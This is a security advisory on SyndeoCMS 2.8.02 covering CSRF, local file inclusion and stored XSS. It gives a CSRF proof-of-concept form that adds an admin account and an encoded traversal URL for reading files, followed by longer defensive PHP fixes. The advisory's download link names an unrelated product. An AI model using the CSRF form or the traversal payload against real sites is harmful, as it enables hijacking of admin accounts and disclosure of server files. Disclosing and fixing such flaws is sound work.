
Abysssec Research
1) Advisory information

| Field | Value |
| --- | --- |
| Title | SyndeoCMS 2.8.02 Multiple Vulnerabilities |
| Affected | SyndeoCMS <= 2.8.02 |
| Discovery | www.abysssec.com |
| Vendor | http://www.syndeocms.org |
| Download | http://visinia.codeplex.com/releases |
| Impact | Critical |
| Contact | shahin [at] abysssec.com , info [at] abysssec.com |
| Twitter | @abysssec |
2) Vulnerability Information

| Field | Value |
| --- | --- |
| Class | 1-CSRF 2-File inclusion 3-XSS 4-Stored XSS |
| Impact | An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. It is also possible to download sensitive data from the CMS. |
| Remotely Exploitable | Yes |
| Locally Exploitable | Yes |
3) Vulnerability details

1- CSRF – Add Admin Account:

With this vulnerability you can lure the admin (while he is already logged in) into visiting a malicious site that adds another admin account on the server. Vulnerable location:

index.php?option=configuration&suboption=users&modoption=save_user&user_id=0

The source of the malicious HTML page is:
```html
<form action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" method="POST">
  <input class="textfield" name="fullname" type="hidden" value="csrf" />
  <input class="textfield" name="username" type="hidden" value="abysssec" />
  <input class="textfield" name="password" type="hidden" value="abysssec" />
  <input class="textfield" name="email" type="hidden" value="csrf@abysssec.com" />
  <select name="editor">
    <option selected="selected" value="1">FCKEditor</option>
    <option value="2">Plain text Editor</option>
  </select>
  <input checked="checked" name="initial" type="checkbox" value="1" />
  <input class="textfield" name="sections" type="hidden" />
  <input name="access_1" type="radio" value="1" />
  <input name="access_2" type="radio" value="1" />
  . . .
  <input name="access_15" type="radio" value="1" />
  <input name="m_access[0]" type="radio" value="1" />
  . . .
  <input name="m_access[21]" type="radio" value="1" />
  <input class="savebutton" name="savebutton" type="submit" value=" Save" />
</form>
```
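The root cause is that save_user accepts any POST carrying the right field names, with nothing proving the request originated from the CMS's own form. The fix a defender would apply is a per-session anti-CSRF token that the admin form embeds and that the handler verifies before touching accounts. The following is an added example written for this advisory, not SyndeoCMS code; the function names, the `csrf_token` field name and the use of PHP sessions are assumptions.

```php
<?php
// Added example (not SyndeoCMS code): anti-CSRF token for a state-changing
// admin action such as modoption=save_user. Assumes PHP >= 7 and that the
// admin session is already established with session_start().
session_start();

function csrf_token(): string {
    // One unguessable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string {
    // Emit this inside every state-changing form the CMS renders.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(array $post): bool {
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an empty session token never matches.
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Handler side: verify method and token before any account is created.
if (($_GET['modoption'] ?? '') === 'save_user') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... validate the submitted fields and save the user here ...
}
```

A page on another origin cannot read the token out of the admin's session or out of the legitimate form, so a forged POST like the one above arrives without a valid `csrf_token` and is rejected. Setting the session cookie with `SameSite=Lax` or `Strict` (via `session_set_cookie_params()` on PHP 7.3+) is a complementary, browser-enforced layer, but it should not replace the token check.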
2- LFI (Local File Inclusion):

Vulnerable code is located in starnet\core\con_configuration.inc.php, lines 61-73:
```php
switch ($modoption) // start of switch
{
    case save_css :
        if (IsSet ($_POST['content']))
        {
            $content = $_POST['content'];
        }
        // Only the literal substring "../" is rejected; $theme is otherwise
        // used as-is to build the file path.
        if (strpos($theme, "../") === FALSE) // check if someone is trying to fool us.
        {
            $filename = "themes/$theme/style.css";
            // ... rest of the case omitted in the advisory ...
        }
}
```
Using this path you can include any file from the server. PoC:

http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00

As you may have noticed in the code, the theme parameter is only checked for "../", which can be bypassed with "..%2F".
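A substring blacklist is the wrong tool for path handling: it misses encoded forms, the null byte in the PoC, and on Windows (where this CMS's paths use backslashes) the `..\` separator. The defensive pattern is to allow-list the theme name strictly and then confirm that the resolved path still lies inside the themes directory. This is an added example written for this advisory, not SyndeoCMS code; `THEME_DIR` and the function names are assumptions.

```php
<?php
// Added example (not SyndeoCMS code): validating a user-supplied theme name.
// THEME_DIR is an assumed constant pointing at the CMS themes directory.
define('THEME_DIR', __DIR__ . '/themes');

// The advisory's check, kept for comparison: it rejects only a literal "../".
function theme_css_path_weak(string $theme): ?string {
    if (strpos($theme, "../") === FALSE) {
        return "themes/$theme/style.css";
    }
    return null;
}

// Step 1: a strict allow-list. Plain names only: no separators of either kind,
// no dots, no NUL bytes, no percent signs, bounded length.
function valid_theme_name(string $theme): bool {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme) === 1;
}

// Step 2: resolve the file and prove the canonical path stays under THEME_DIR.
// realpath() follows symlinks, so a theme directory linked elsewhere is caught too.
function theme_css_path(string $theme): ?string {
    if (!valid_theme_name($theme)) {
        return null;
    }
    $base = realpath(THEME_DIR);
    $real = realpath(THEME_DIR . '/' . $theme . '/style.css');
    if ($base === false || $real === false) {
        return null; // themes dir or the requested file does not exist
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // canonical path escaped the themes directory
    }
    return $real;
}

// Constructed inputs; no files are read here, only the name check runs.
$samples = ["default", "../index.php\0", "..%2Findex.php", "..\\index.php", "a/b"];
foreach ($samples as $t) {
    printf("%-22s weak_accepts=%-5s allowlist_accepts=%s\n",
        json_encode($t),
        theme_css_path_weak($t) !== null ? 'true' : 'false',
        valid_theme_name($t) ? 'true' : 'false');
}
```

Running the loop shows the weak check still returning a path for the `%2F`, backslash and null-byte variants while the allow-list accepts only `default`. The allow-list must run before `realpath()`: on PHP 8 `realpath()` refuses strings containing NUL bytes with a ValueError, and earlier versions silently truncated at the NUL, which is exactly the `%00` trick in the PoC.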
3- XSS in starnet\core\con_alerts.inc.php, "email" parameter, when "modoption" is "save_alert".

PoC:

http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2

4- Stored XSS in starnet\core\con_alerts.inc.php, "name" parameter, when "modoption" is "save_alert": you can put script in there and it will be stored.

http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert
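Both alert issues have the same shape: a value saved by save_alert is later written back into the edit_alert form without HTML encoding. The fix is contextual output escaping at the point the value enters HTML, with input validation on save as defense in depth. The following is an added example written for this advisory, not SyndeoCMS code; the helper names and the form markup are assumptions.

```php
<?php
// Added example (not SyndeoCMS code): escaping stored alert fields on output
// and validating them on save. Function names are assumed.

// Escape for an HTML body or attribute context. ENT_QUOTES covers both quote
// characters so the value is safe inside value="..." as well as between tags.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Validation for save_alert: reject obviously malformed input early, but do not
// rely on this to make output safe; escaping on output is what stops XSS.
function validate_alert_input(array $post): array {
    $errors = [];
    $name  = trim((string)($post['name'] ?? ''));
    $email = trim((string)($post['email'] ?? ''));
    if ($name === '' || strlen($name) > 100) {
        $errors[] = 'name must be 1-100 bytes';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email is not a valid address';
    }
    return ['ok' => $errors === [], 'errors' => $errors, 'name' => $name, 'email' => $email];
}

// Rendering for edit_alert: every stored value is escaped, whatever it contains.
function render_alert_form(string $name, string $email): string {
    return '<input name="name" value="' . e($name) . '">' . "\n"
         . '<input name="email" value="' . e($email) . '">';
}

// Constructed sample resembling a stored payload (not from the advisory):
$stored_name  = '"><b>injected</b>';
$stored_email = 'user@example.com';
echo render_alert_form($stored_name, $stored_email), "\n";
// The quote and angle brackets are emitted as &quot; &gt; &lt;, so the browser
// shows them as literal text inside the attribute instead of closing it.

print_r(validate_alert_input(['name' => 'x', 'email' => 'not-an-email']));
```

Escaping belongs in the template layer, not in the save path: stripping tags on input leaves the stored value unusable for non-HTML contexts (e-mail subjects, logs) and still fails when a later code path renders it into a different context such as a JavaScript string, which needs its own encoder.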